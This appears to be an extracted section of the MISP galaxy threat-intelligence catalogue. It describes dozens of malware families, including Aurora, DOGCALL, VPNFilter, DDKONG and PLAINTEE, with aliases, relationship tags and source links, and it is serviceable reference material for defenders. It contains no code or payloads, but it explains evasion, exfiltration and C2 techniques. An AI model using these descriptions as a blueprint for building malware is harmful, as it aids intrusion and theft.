You probably have heard the recent news about a widespread attack that was carried out using a 0-Day exploit for Internet Explorer as one of the vectors. This exploit is also known as the "Aurora Exploit". The code has recently gone public and it was also added to the Metasploit framework. This
exploit was used to deliver a malicious payload, known by the name of Trojan.Hydraq, the main purpose of which was to steal information from the compromised computer and report it back to the attackers. The exploit code makes use of known techniques to exploit a vulnerability that exists in the way Internet Explorer handles a deleted object. The final purpose of the exploit itself is to access an object that was previously deleted, causing the code to reference a memory location over which the attacker has control and in which the attacker dropped his malicious code.

The tag is: misp-galaxy:tool="Aurora"

Aurora is also known as:

• Hydraq

Aurora has relationships with:

• similar: misp-galaxy:mitre-malware="Hydraq - S0203" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:malpedia="9002 RAT" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:malpedia="Aurora" with estimative-language:likelihood-probability="likely"

Cheshire Cat

Oldest Cheshire Cat malware compiled in 2002. It's a very old family of malware. The time stamps may be forged but the malware does have support for very old operating systems. The 2002 implant retrieves a handle for an asr2892 drives that they never got their hands on. It checks for a NE header which is a header type used before PE headers even existed. References to 16bit or DOS on a non 9x platform. This malware implant IS REALLY for old systems. The malware is for espionage - it's very carefully made to stay hidden. Newer versions install as icon handler shell extension for .lnk files. Shell in this case means the program manager because windows explorer was not yet a thing. It sets up COM server objects. It looks like it was written in pure C, but made to look like C++. A sensitive implant as well: it checks for all kinds of old MS platforms including Windows NT, win95, win98, winME and more. It checks the patch level as well. A lot of effort was put into adapting this malware to a lot of different operating systems with very granular decision chains.

The tag is: misp-galaxy:tool="Cheshire Cat"

Table 6554. Table References

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<td><a href="https://www.symantec.com/connect/blogs/trojanhydraq-incident-analysis-aurora-0-day-exploit">https://www.symantec.com/connect/blogs/trojanhydraq-incident-analysis-aurora-0-day-exploit</a></td>
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<td><a href="https://www.symantec.com/connect/blogs/hydraq-aurora-attackers-back">https://www.symantec.com/connect/blogs/hydraq-aurora-attackers-back</a></td>
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<td><a href="https://www.symantec.com/connect/blogs/hydraq-attack-mythical-proportions">https://www.symantec.com/connect/blogs/hydraq-attack-mythical-proportions</a></td>
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Table 6555. Table References

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Downloader-FGO

Downloader-FGO is a trojan that comes hidden in malicious programs. Once you install the source (carrier) program, this trojan attempts to gain "root" access (administrator level access) to your computer without your knowledge.

The tag is: misp-galaxy:tool="Downloader-FGO"

Downloader-FGO is also known as:

- Win32:Malware-gen
- Generic30.ASYL (Trojan horse)
- TR/Agent.84480.85
- Trojan.Generic.8627031
- Trojan:Win32/Sisproc
- SB/Malware
- Trj/CLA
- Mal/Behav-112
- Trojan.Spuler
- TROJ_KAZY.SM1
- Win32/FakePPT_i

miniFlame

Newly discovered spying malware designed to steal data from infected systems was likely built from the same cyber-weaponry factory that produced two other notorious cyberespionage software Flame and Gauss, a security vendor says. Kaspersky Lab released a technical paper Monday outlining the discovery of the malware the vendor has dubbed "miniFlame." While capable of working with Flame and Gauss, miniFlame is a "small, fully functional espionage module designed for data theft and direct access to infected systems," Kaspersky said.

The tag is: misp-galaxy:tool="miniFlame"
**GHOTEX**

PE_GHOTEX.A-O is a portable executable (PE is the standard executable format for 32-bit Windows files) virus. PE viruses infect executable Windows files by incorporating their code into these files such that they are executed when the infected files are opened.

The tag is: `misp-galaxy:tool="GHOTEX"`

**Table 6558. Table References**

Links

- https://www.trendmicro.com/vinfo/dk/threat-encyclopedia/archive/malware/pe_ghotex.a-o

**Shipup**

Trojan:Win32/Shipup.G is a trojan that modifies the Autorun feature for certain devices.

The tag is: `misp-galaxy:tool="Shipup"`

**Table 6559. Table References**

Links


**Neuron**

Neuron consists of both client and server components. The Neuron client and Neuron service are written using the .NET framework with some codebase overlaps. The Neuron client is used to infect victim endpoints and extract sensitive information from local client machines. The Neuron server is used to infect network infrastructure such as mail and web servers, and acts as local Command & Control (C2) for the client component. Establishing a local C2 limits interaction with the target
network and remote hosts. It also reduces the log footprint of actor infrastructure and enables client interaction to appear more convincing as the traffic is contained within the target network.

The tag is: `misp-galaxy:tool="Neuron"`

Neuron has relationships with:

- similar: `misp-galaxy:malpedia="Neuron"` with `estimative-language:likelihood-probability="likely"

**Nautilus**

Nautilus is very similar to Neuron both in the targeting of mail servers and how client communications are performed. This malware is referred to as Nautilus due to its embedded internal DLL name “nautilus-service.dll”, again sharing some resemblance to Neuron. The Nautilus service listens for HTTP requests from clients to process tasking requests such as executing commands, deleting files and writing files to disk.

The tag is: `misp-galaxy:tool="Nautilus"`

Nautilus has relationships with:

- similar: `misp-galaxy:malpedia="Nautilus"` with `estimative-language:likelihood-probability="likely"

**Gamut Botnet**

Gamut was found to be downloaded by a Trojan Downloader that arrives as an attachment from a spam email message. The bot installation is quite simple. After the malware binary has been downloaded, it launches itself from its current directory, usually the Windows %Temp% folder and installs itself as a Windows service. The malware utilizes an anti-VM (virtual machine) trick and terminates itself if it detects that it is running in a virtual machine environment. The bot uses INT 03h trap sporadically in its code, an anti-debugging technique which prevents its code from running within a debugger environment. It can also determine if it is being debugged by using the Kernel32 API - IsDebuggerPresent function.

The tag is: `misp-galaxy:tool="Gamut Botnet"`
CORALDECK

CORALDECK is an exfiltration tool that searches for specified files and exfiltrates them in password protected archives using hardcoded HTTP POST headers. CORALDECK has been observed dropping and using Winrar to exfiltrate data in password protected RAR files as well as WinImage and zip archives.

The tag is: `misp-galaxy:tool="CORALDECK"`

CORALDECK is also known as:

- APT.InfoStealer.Win.CORALDECK
- FE_APT_InfoStealer_Win_CORALDECK_1

CORALDECK has relationships with:

- similar: `misp-galaxy:mitre-malware="CORALDECK - S0212"` with `estimative-language:likelihood-probability="likely"`

DOGCALL

DOGCALL is a backdoor commonly distributed as an encoded binary file downloaded and decrypted by shellcode following the exploitation of weaponized documents. DOGCALL is capable of capturing screenshots, logging keystrokes, evading analysis with anti-virtual machine detections, and leveraging cloud storage APIs such as Cloud, Box, Dropbox, and Yandex. DOGCALL was used to target South Korean Government and military organizations in March and April 2017. The malware is typically dropped using an HWP exploit in a lure document. The wiper tool, RUHAPPY, was found on some of the systems targeted by DOGCALL. While DOGCALL is primarily an espionage tool, RUHAPPY is a destructive wiper tool meant to render systems inoperable.

The tag is: `misp-galaxy:tool="DOGCALL"`

DOGCALL is also known as:

- FE_APT_RAT_DOGCALL
- FE_APT_Backdoor_Win32_DOGCALL_1
• APT.Backdoor.Win.DOGCALL

DOGCALL has relationships with:

• similar: misp-galaxy:mitre-malware="DOGCALL - S0213" with estimative-language:likelihood-probability="likely"

Table 6564. Table References

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<td><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf</a></td>
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**GELCAPSULE**

GELCAPSULE is a downloader traditionally dropped or downloaded by an exploit document. GELCAPSULE has been observed downloading SLOWDRIFT to victim systems.

The tag is: misp-galaxy:tool="GELCAPSULE"

GELCAPSULE is also known as:

• FE_APT_Downloader_Win32_GELCAPSULE_1

Table 6565. Table References

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<td><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf</a></td>
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**HAPPYWORK**

HAPPYWORK is a malicious downloader that can download and execute a second-stage payload, collect system information, and beacon it to the command and control domains. The collected system information includes: computer name, user name, system manufacturer via registry, IsDebuggerPresent state, and execution path. In November 2016, HAPPYWORK targeted government and financial targets in South Korea.

The tag is: misp-galaxy:tool="HAPPYWORK"

HAPPYWORK is also known as:

• FE_APT_Downloader_HAPPYWORK
• FE_APT_Exploit_HWP_Happy
• Downloader.APT.HAPPYWORK

HAPPYWORK has relationships with:

• similar: misp-galaxy:mitre-malware="HAPPYWORK - S0214" with estimative-
KARAE

Karae backdoors are typically used as first-stage malware after an initial compromise. The backdoors can collect system information, upload and download files, and may be used to retrieve a second-stage payload. The malware uses public cloud-based storage providers for command and control. In March 2016, KARAE malware was distributed through torrent file-sharing websites for South Korean users. During this campaign, the malware used a YouTube video downloader application as a lure.

The tag is: misp-galaxy:tool="KARAE"

KARAE is also known as:

- FE_APT_Backdoor_Karae_enc
- FE_APT_Backdoor_Karae
- Backdoor.APT.Karae

KARAE has relationships with:

- similar: misp-galaxy:mitre-malware="KARAE - S0215" with estimative-language:likelihood-probability="likely"

MILKDROP

MILKDROP is a launcher that sets a persistence registry key and launches a backdoor.

The tag is: misp-galaxy:tool="MILKDROP"

MILKDROP is also known as:

- FE_Trojan_Win32_MILKDROP_1

Table 657. Table References

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POORAIM

POORAIM malware is designed with basic backdoor functionality and leverages AOL Instant Messenger for command and control communications. POORAIM includes the following capabilities: System information enumeration, File browsing, manipulation and exfiltration, Process enumeration, Screen capture, File execution, Exfiltration of browser favorites, and battery status. Exfiltrated data is sent via files over AIM. POORAIM has been involved in campaigns against South Korean media organizations and sites relating to North Korean refugees and defectors since early 2014. Compromised sites have acted as watering holes to deliver newer variants of POORAIM.

The tag is: `misp-galaxy:tool="POORAIM"`

POORAIM is also known as:

- Backdoor.APT.POORAIM

POORAIM has relationships with:

- similar: `misp-galaxy:mitre-malware="POORAIM - S0216"` with estimative-language:likelihood-probability="likely"

Table 6569. Table References

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RICECURRY

RICECURRY is a Javascript based profiler used to fingerprint a victim's web browser and deliver malicious code in return. Browser, operating system, and Adobe Flash version are detected by RICECURRY, which may be a modified version of PluginDetect.

The tag is: `misp-galaxy:tool="RICECURRY"`

RICECURRY is also known as:

- Exploit.APT.RICECURRY

Table 6570. Table References

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<td><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf</a></td>
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RUHAPPY

RUHAPPY is a destructive wiper tool seen on systems targeted by DOGCALL. It attempts to overwrite the MBR, causing the system not to boot. When victims' systems attempt to boot, the string 'Are you Happy?' is displayed. The malware is believed to be tied to the developers of DOGCALL and HAPPYWORK based on similar PDB paths in all three.
RUHAPPY is also known as:

- FE_APT_Trojan_Win32_RUHAPPY_1

Table 6571. Table References

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<tr>
<td><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf</a></td>
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**SHUTTERSPEED**

SHUTTERSPEED is a backdoor that can collect system information, acquire screenshots, and download/execute an arbitrary executable. SHUTTERSPEED typically requires an argument at runtime in order to execute fully. Observed arguments used by SHUTTERSPEED include: 'help', 'console', and 'sample'. The spear phishing email messages contained documents exploiting RTF vulnerability CVE-2017-0199. Many of the compromised domains in the command and control infrastructure are linked to South Korean companies. Most of these domains host a fake webpage pertinent to targets.

The tag is: *misp-galaxy:tool="SHUTTERSPEED"*

SHUTTERSPEED is also known as:

- FE_APT_Backdoor_SHUTTERSPEED
- APT.Backdoor.SHUTTERSPEED

SHUTTERSPEED has relationships with:

- similar: misp-galaxy:mitre-malware="SHUTTERSPEED - S0217" with estimative-language:likelihood-probability="likely"

Table 6572. Table References

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<tr>
<td><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf</a></td>
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**SLOWDRIFT**

SLOWDRIFT is a launcher that communicates via cloud based infrastructure. It sends system information to the attacker command and control and then downloads and executes additional payloads. Lure documents distributing SLOWDRIFT were not tailored for specific victims, suggesting that TEMP.Reaper is attempting to widen its target base across multiple industries and in the private sector. SLOWDRIFT was seen being deployed against academic and strategic targets in South Korea using lure emails with documents leveraging the HWP exploit. Recent SLOWDRIFT samples were uncovered in June 2017 with lure documents pertaining to cyber crime prevention and news stories. These documents were last updated by the same actor who developed KARAE, POORAIM and ZUMKONG.
The tag is: misp-galaxy:tool="SLOWDRIFT"

SLOWDRIFT is also known as:

- FE_APT.Downloader.Win_SLOWDRIFT_1
- FE_APT.Downloader.Win_SLOWDRIFT_2
- APT.Downloader.SLOWDRIFT

SLOWDRIFT has relationships with:

- similar: misp-galaxy:mitre-malware="SLOWDRIFT - S0218" with estimative-language:likelihood-probability="likely"

SOUNDWAVE

SOUNDWAVE is a windows based audio capturing utility. Via command line it accepts the -l switch (for listen probably), captures microphone input for 100 minutes, writing the data out to a log file in this format: C:\Temp\HncDownload\YYYYMMDDHHMMSS.log.

The tag is: misp-galaxy:tool="SOUNDWAVE"

SOUNDWAVE is also known as:

- FE_APT_HackTool.Win32 SOUNDWAVE_1

ZUMKONG

ZUMKONG is a credential stealer capable of harvesting usernames and passwords stored by Internet Explorer and Chrome browsers. Stolen credentials are emailed to the attacker via HTTP POST requests to mail[.]zmail[.]ru.

The tag is: misp-galaxy:tool="ZUMKONG"

ZUMKONG is also known as:

- FE_APT_Trojan_Zumkong
- Trojan.APT.Zumkong
WINERACK

WINERACK is backdoor whose primary features include user and host information gathering, process creation and termination, filesystem and registry manipulation, as well as the creation of a reverse shell that utilizes statically-linked Wine cmd.exe code to emulate Windows command prompt commands. Other capabilities include the enumeration of files, directories, services, active windows and processes.

The tag is: misp-galaxy:tool="WINERACK"

WINERACK is also known as:

- FE_APT_Backdoor_WINERACK
- Backdoor.APT.WINERACK

WINERACK has relationships with:

- similar: misp-galaxy:mitre-malware="WINERACK - S0219" with estimative-language:likelihood-probability="likely"

RoyalCli

The RoyalCli backdoor appears to be an evolution of BS2005 and uses familiar encryption and encoding routines. The name RoyalCli was chosen by us due to a debugging path left in the binary: ‘c:\users\wizard\documents\visual studio 2010\Projects\RoyalCli\Release\RoyalCli.pdb’ RoyalCli and BS2005 both communicate with the attacker’s command and control (C2) through Internet Explorer (IE) by using the COM interface IWebBrowser2. Due to the nature of the technique, this results in C2 data being cached to disk by the IE process; we’ll get to this later.

The tag is: misp-galaxy:tool="RoyalCli"

RoyalCli has relationships with:

- similar: misp-galaxy:malpedia="RoyalCli" with estimative-language:likelihood-probability="likely"
RoyalDNS

The tag is: *misp-galaxy:tool="RoyalDNS"

Table 6578. Table References

Links


SHARPKNOT

The tag is: *misp-galaxy:tool="SHARPKNOT"

SHARPKNOT has relationships with:

• similar: *misp-galaxy:malpedia="SHARPKNOT" with estimative-language:likelihood-probability="likely"

Table 6579. Table References

Links

https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf

KillDisk Wiper

KillDisk, along with the multipurpose, cyberespionage-related BlackEnergy, was used in cyberattacks in late December 2015 against Ukraine’s energy sector as well as its banking, rail, and mining industries. The malware has since metamorphosed into a threat used for digital extortion, affecting Windows and Linux platforms. The note accompanying the ransomware versions, like in the case of Petya, was a ruse: Because KillDisk also overwrites and deletes files (and don’t store the encryption keys on disk or online), recovering the scrambled files was out of the question. The new variant we found, however, does not include a ransom note.

The tag is: *misp-galaxy:tool="KillDisk Wiper"

KillDisk Wiper is also known as:

• KillDisk

KillDisk Wiper has relationships with:

• similar: *misp-galaxy:malpedia="KillDisk" with estimative-language:likelihood-probability="likely"

Table 6580. Table References
UselessDisk

A new MBR bootlocker called DiskWriter, or UselessDisk, has been discovered that overwrites the MBR of a victim’s computer and then displays a ransom screen on reboot instead of booting into Windows. This ransom note asks for $300 in bitcoins in order to gain access to Windows again. Might be a wiper.

The tag is: misp-galaxy:tool="UselessDisk"

UselessDisk is also known as:

- DiskWriter

GoScanSSH

During a recent Incident Response (IR) engagement, Talos identified a new malware family that was being used to compromise SSH servers exposed to the internet. This malware, which we have named GoScanSSH, was written using the Go programming language, and exhibited several interesting characteristics. This is not the first malware family that Talos has observed that was written using Go. However, it is relatively uncommon to see malware written in this programming language. In this particular case, we also observed that the attacker created unique malware binaries for each host that was infected with the GoScanSSH malware. Additionally, the GoScanSSH command and control (C2) infrastructure was observed leveraging the Tor2Web proxy service in an attempt to make tracking the attacker-controlled infrastructure more difficult and resilient to takedowns.

The tag is: misp-galaxy:tool="GoScanSSH"
**Rovnix**

We recently found that the malware family ROVNIX is capable of being distributed via macro downloader. This malware technique was previously seen in the DRIDEX malware, which was notable for using the same routines. DRIDEX is also known as the successor of the banking malware CRIDEX.

The tag is: *misp-galaxy:tool=*Rovnix*

Rovnix is also known as:

- ROVNIX

Rovnix has relationships with:

- similar: *misp-galaxy:malpedia=*Rovnix* with *estimative-language:likelihood-probability=*likely*

Table 6583. Table References

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**Kwampirs**

Once Orangeworm has infiltrated a victim’s network, they deploy Trojan.Kwampirs, a backdoor Trojan that provides the attackers with remote access to the compromised computer. When executed, Kwampirs decrypts and extracts a copy of its main DLL payload from its resource section. Before writing the payload to disk, it inserts a randomly generated string into the middle of the decrypted payload in an attempt to evade hash-based detections.

The tag is: *misp-galaxy:tool=*Kwampirs*

Kwampirs has relationships with:

- similar: *misp-galaxy:malpedia=*Kwampirs* with *estimative-language:likelihood-probability=*likely*

Table 6584. Table References

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**Rubella Macro Builder**

A crimeware kit dubbed the Rubella Macro Builder has recently been gaining popularity among members of a top-tier Russian hacking forum. Despite being relatively new and unsophisticated,
the kit has a clear appeal for cybercriminals: it’s cheap, fast, and can defeat basic static antivirus detection.

The tag is: `misp-galaxy:tool="Rubella Macro Builder"`

### Table 6585. Table References

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<tr>
<td><a href="https://www.flashpoint-intel.com/blog/rubella-macro-builder/">https://www.flashpoint-intel.com/blog/rubella-macro-builder/</a></td>
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</table>

#### kitty Malware

Researchers at Imperva's Incapsula said a new piece malware called Kitty leaves a note for cat lovers. It attacks the Drupal content management system (CMS) to illegally mine cryptocurrency Monero.

The tag is: `misp-galaxy:tool="kitty Malware"`

### Table 6586. Table References

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#### Maikspy

We discovered a malware family called Maikspy — a multi-platform spyware that can steal users’ private data. The spyware targets Windows and Android users, and first posed as an adult game named after a popular U.S.-based adult film actress. Maikspy, which is an alias that combines the name of the adult film actress and spyware, has been around since 2016.

The tag is: `misp-galaxy:tool="Maikspy"`

### Table 6587. Table References

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#### Huigezi malware

Backdoor trojan popular found prevalently in China

The tag is: `misp-galaxy:tool="Huigezi malware"`

### Table 6588. Table References
FacexWorm

Facebook, Chrome, and cryptocurrency users should be on the lookout for a new malware strain named FacexWorm that infects victims for the purpose of stealing passwords, stealing cryptocurrency funds, running cryptojacking scripts, and spamming Facebook users. This new strain was spotted in late April by Trend Micro researchers and appears to be related to two other Facebook Messenger spam campaigns, one that took place last August, and another one from December 2017, the latter spreading the Digmine malware. Researchers say FacexWorm’s modus operandi is similar to the previous two campaigns, but with the addition of new techniques aimed at cryptocurrency users.

The tag is: `misp-galaxy:tool="FacexWorm"`

Bankshot

implant used in Operation GhostSecret

The tag is: `misp-galaxy:tool="Bankshot"`

Bankshot has relationships with:

- similar: `misp-galaxy:malpedia="Bankshot"` with `estimative-language:likelihood-probability="likely"

Proxysvc

downloader used in Operation GhostSecret

The tag is: `misp-galaxy:tool="Proxysvc"`
Escad

backdoor used in Operation GhostSecret

The tag is: *misp-galaxy:tool*="Escad"

StalinLocker

A new in-development screenlocker/wiper called StalinLocker, or StalinScreamer, was discovered by MalwareHunterTeam that gives you 10 minutes to enter a code or it will try to delete the contents of the drives on the computer. While running, it will display screen that shows Stalin while playing the USSR anthem and displaying a countdown until files are deleted.

The tag is: *misp-galaxy:tool*="StalinLocker"

StalinLocker is also known as:

• StalinScreamer

VPNFilter

Advanced, likely state-sponsored or state-affiliated modular malware. The code of this malware overlaps with versions of the BlackEnergy malware. Targeted devices are Linksys, MikroTik, NETGEAR and TP-Link networking equipment in the small and home office (SOHO) space, as well as QNAP network-attached storage (NAS) systems.

The tag is: *misp-galaxy:tool*="VPNFilter"
Iron Backdoor

Iron Backdoor uses a virtual machine detection code taken directly from HackingTeam’s Soldier implant leaked source code. Iron Backdoor is also using the DynamicCall module from HackingTeam core library. Backdoor was used to drop cryptocurrency miners.

The tag is: *misp-galaxy:tool="Iron Backdoor"*

Table 6595. Table References

Links

https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/

Brambul

Brambul malware is a malicious Windows 32-bit SMB worm that functions as a service dynamic link library file or a portable executable file often dropped and installed onto victims’ networks by dropper malware. When executed, the malware attempts to establish contact with victim systems and IP addresses on victims’ local subnets. If successful, the application attempts to gain unauthorized access via the SMB protocol (ports 139 and 445) by launching brute-force password attacks using a list of embedded passwords. Additionally, the malware generates random IP addresses for further attacks.

The tag is: *misp-galaxy:tool="Brambul"*

Brambul has relationships with:

• similar: misp-galaxy:malpedia="Brambul" with estimative-language:likelihood-probability="likely"

Table 6596. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA18-149A

PLEAD

PLEAD has two kinds – RAT (Remote Access Tool) and downloader. The RAT operates based on commands that are provided from C&C servers. On the other hand, PLEAD downloader downloads modules and runs it on memory in the same way as TSCookie does.

The tag is: *misp-galaxy:tool="PLEAD"*

PLEAD has relationships with:

• similar: misp-galaxy:malpedia="PLEAD (Windows)" with estimative-language:likelihood-probability="likely"
BabaYaga

The group behind BabaYaga—believed to be Russian-speaking hackers—uses this malware to inject sites with special keyboards to drive SEO traffic to hidden pages on compromised sites. These pages are then used to redirect users to affiliate marketing links, where if the user purchases advertised goods, the hackers also make a profit. The malware per-se is comprised of two modules—one that injects the spam content inside the compromised sites, and a backdoor module that gives attackers control over an infected site at any time. The intricacies of both modules are detailed in much more depth in this 26-page report authored by Defiant (formerly known as WordFence), the security firm which dissected the malware’s more recent versions. “[BabaYaga] is relatively well-written, and it demonstrates that the author has some understanding of software development challenges, like code deployment, performance and management,” Defiant researchers say. “It can also infect Joomla and Drupal sites, or even generic PHP sites, but it is most fully developed around Wordpress.”

The tag is: misp-galaxy:tool="BabaYaga"

InvisiMole

Except for the malware’s binary file, very little is known of who’s behind it, how it spreads, or in what types of campaigns has this been used.

"Our telemetry indicates that the malicious actors behind this malware have been active at least since 2013, yet the cyber-espionage tool was never analyzed nor detected until discovered by ESET products on compromised computers in Ukraine and Russia," said ESET researcher Zuzana Hromcová, who recently penned an in-depth report about this new threat.

"All infection vectors are possible, including installation facilitated by physical access to the machine," Hromcová added.

Typical to malware used in highly-targeted attacks, the malware has been stripped of most clues that could lead researchers back to its author. With the exception of one file (dating to October 13, 2013), all compilation dates have been stripped and replaced with zeros, giving little clues regarding its timeline and lifespan.

Furthermore, the malware is some clever piece of coding in itself, as it’s comprised of two modules,
both with their own set of spying features, but which can also help each other in exfiltrating data.

The tag is: *misp-galaxy:tool*="InvisiMole"

InvisiMole has relationships with:

- similar: *misp-galaxy:malpedia*="InvisiMole" with estimative-language:likelihood-probability="likely"

**Roaming Mantis**

Roaming Mantis malware is designed for distribution through a simple, but very efficient trick based on a technique known as DNS hijacking. When a user attempts to access any website via a compromised router, they will be redirected to a malicious website. For example, if a user were to navigate to www.securelist.com using a web browser, the browser would be redirected to a rogue server which has nothing to do with the security research blog. As long as the browser displays the original URL, users are likely to believe the website is genuine. The web page from the rogue server displays the popup message: To better experience the browsing, update to the latest chrome version.

The tag is: *misp-galaxy:tool*="Roaming Mantis"

Roaming Mantis has relationships with:

- similar: *misp-galaxy:malpedia*="Roaming Mantis" with estimative-language:likelihood-probability="likely"

**PLEAD Downloader**

PLEAD is referred to both as a name of malware including TSCookie and its attack campaign. PLEAD has two kinds – RAT (Remote Access Tool) and downloader. The RAT operates based on commands that are provided from C&C servers. On the other hand, PLEAD downloader downloads modules and runs it on memory in the same way as TSCookie does.

The tag is: *misp-galaxy:tool*="PLEAD Downloader"
ClipboardWalletHijacker

The malware’s purpose is to intercept content recorded in the Windows clipboard, look for strings resembling Bitcoin and Ethereum addresses, and replace them with ones owned by the malware’s authors. ClipboardWalletHijacker’s end-plan is to hijack BTC and ETH transactions, so victims unwittingly send funds to the malware’s authors.

The tag is: `misp-galaxy:tool="ClipboardWalletHijacker"`

Table 6602. Table References

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<td><a href="https://blog.360totalsecurity.com/en/new-cryptominer-hijacks-your-bitcoin-transaction-over-300000-computers-have-been-attacked/">https://blog.360totalsecurity.com/en/new-cryptominer-hijacks-your-bitcoin-transaction-over-300000-computers-have-been-attacked/</a></td>
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TYPEFRAME

Trojan malware

The tag is: `misp-galaxy:tool="TYPEFRAME"`

Table 6603. Table References

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<tr>
<td><a href="https://www.us-cert.gov/ncas/analysis-reports/AR18-165A">https://www.us-cert.gov/ncas/analysis-reports/AR18-165A</a></td>
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Olympic Destroyer

The Winter Olympics this year is being held in Pyeongchang, South Korea. The Guardian, a UK Newspaper reported an article that suggested the Olympic computer systems suffered technical issues during the opening ceremony. Officials at the games confirmed some technical issues to non-critical systems and they completed recovery within around 12 hours. Sunday 11th February the Olympic games officials confirmed a cyber attack occurred but did not comment or speculate further. Talos have identified the samples, with moderate confidence, used in this attack. The infection vector is currently unknown as we continue to investigate. The samples identified, however, are not from adversaries looking for information from the games but instead they are aimed to disrupt the games. The samples analysed appear to perform only destructive functionality. There does not appear to be any exfiltration of data. Analysis shows that actors are again favouring legitimate pieces of software as PsExec functionality is identified within the sample. The destructive nature of this malware aims to render the machine unusable by deleting shadow copies, event logs and trying to use PsExec & WMI to further move through the environment. This is something we have witnessed previously with BadRabbit and Nyetya.
The tag is: *misp-galaxy:tool="Olympic Destroyer"*

Olympic Destroyer has relationships with:

- similar: misp-galaxy:malpedia="Olympic Destroyer" with estimative-language:likelihood-probability="likely"

*Table 6604. Table References*

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<tr>
<td><a href="https://blog.talosintelligence.com/2018/02/olympic-destroyer.html">https://blog.talosintelligence.com/2018/02/olympic-destroyer.html</a></td>
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**DDKONG**

The malware in question is configured with the following three exported functions: `ServiceMain`, `Rundll32Call`, `DllEntryPoint`. The `ServiceMain` exported function indicates that this DLL is expected to be loaded as a service. If this function is successfully loaded, it will ultimately spawn a new instance of itself with the `Rundll32Call` export via a call to `rundll32.exe`. The `Rundll32Call` exported function begins by creating a named event named ‘RunOnce’. This event ensures that only a single instance of DDKong is executed at a given time. If this is the only instance of DDKong running at the time, the malware continues. If it’s not, it dies. This ensures that only a single instance of DDKong is executed at a given time. DDKong attempts to decode an embedded configuration using a single byte XOR key of 0xC3. After this configuration is decoded and parsed, DDKONG proceeds to send a beacon to the configured remote server via a raw TCP connection. The packet has a header of length 32 and an optional payload. In the beacon, no payload is provided, and as such, the length of this packet is set to zero. After it sends the beacon, the malware expects a response command of either 0x4 or 0x6. Both responses instruct the malware to download and load a remote plugin. In the event 0x4 is specified, the malware is instructed to load the exported ‘InitAction’ function. If 0x6 is specified, the malware is instructed to load the exported ‘KernelDllCmdAction’ function. Prior to downloading the plugin, the malware downloads a buffer that is concatenated with the embedded configuration and ultimately provided to the plugin at runtime. As we can see in the above text, two full file paths are included in this buffer, providing us with insight into the original malware family’s name, as well as the author. After this buffer is collected, the malware downloads the plugin and loads the appropriate function. This plugin provides the attacker with the ability to both list files and download/upload files on the victim machine.

The tag is: *misp-galaxy:tool="DDKONG"*

DDKONG has relationships with:

- similar: misp-galaxy:malpedia="DDKONG" with estimative-language:likelihood-probability="likely"

*Table 6605. Table References*

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PLAINTEE

This sample is configured with three exported functions: Add, Sub, DllEntryPoint. The DLL expects the export named ‘Add’ to be used when initially loaded. When this function is executed PLAINTEE executes a command in a new process to add persistence. Next, the malware calls the ‘Sub’ function which begins by spawning a mutex named ‘microsoftfuckedupb’ to ensure only a single instance is running at a given time. In addition, PLAINTEE will create a unique GUID via a call to CoCreateGuid() to be used as an identifier for the victim. The malware then proceeds to collect general system enumeration data about the infected machine and enters a loop where it will decode an embedded config blob and send an initial beacon to the C2 server. The configuration blob is encoded using a simple single-byte XOR scheme. The first byte of the string is used as the XOR key to in turn decode the remainder of the data. The malware then proceeds to beacon to the configured port via a custom UDP protocol. The network traffic is encoded in a similar fashion, with a random byte being selected as the first byte, which is then used to decode the remainder of the packet via XOR. This beacon is continuously sent out until a valid response is obtained from the C2 server (there is no sleep timer set). After the initial beacon, there is a two second delay in between all other requests made. This response is expected to have a return command of 0x66660002 and to contain the same GUID that was sent to the C2 server. Once this response is received, the malware spawns several new threads, with different Command parameters, with the overall objective of loading and executing a new plugin that is to be received from the C2 server. During a file analysis of PLAINTEE in WildFire, we observed the attackers download and execute a plugin during the runtime for that sample. PLAINTEE expects the downloaded plugin to be a DLL with an export function of either ‘shell’ or ‘file’. The plugin uses the same network protocol as PLAINTEE and so we were able to trivially decode further commands that were sent. The following commands were observed: tasklist, ipconfig /all. The attacker performed these two commands 33 seconds apart. As automated commands are typically performed more quickly this indicates that they may have been sent manually by the attacker.

The tag is: `misp-galaxy:tool="PLAINTEE"`

PLAINTEE has relationships with:

- similar: `misp-galaxy:malpedia="PLAINTEE"` with `estimative-language:likelihood-probability="likely"`

Table 6606. Table References

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Koadic

Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that
Koadic does most of its operations using Windows Script Host

The tag is: `misp-galaxy:tool="Koadic"`

Koadic has relationships with:

- similar: `misp-galaxy:malpedia="Koadic"` with `estimative-language:likelihood-probability="likely"

Table 6607. Table References

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<tr>
<td><a href="https://github.com/zerosum0x0/koadic">https://github.com/zerosum0x0/koadic</a></td>
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**Bisonal**

In early May, Unit 42 discovered an attack campaign against at least one defense company in Russia and one unidentified organization in South Korea delivering a variant of Bisonal malware. While not previously publicly documented, the variant has been in the wild since at least 2014. There are three primary differences between it and older Bisonal malware including a different cipher and encryption for C2 communication, and a large rewrite of the code for both network communication and maintaining persistence. To date, we have only collected 14 samples of this variant, indicating it may be sparingly used. The adversary behind these attacks lured the targets into launching the Microsoft Windows executable malware by masquerading it as a PDF file (using a fake PDF icon) and reusing publicly available data for the decoy PDF file’s contents. Attacks using Bisonal have been blogged about in the past. In 2013, both COSEINC and FireEye revealed attacks using Bisonal against Japanese organizations. In October 2017, AhnLab published a report called “Operation Bitter Biscuit,” an attack campaign against South Korea, Japan, India and Russia using Bisonal and its successors, Bioazih and Dexbia.

The tag is: `misp-galaxy:tool="Bisonal"

Bisonal has relationships with:

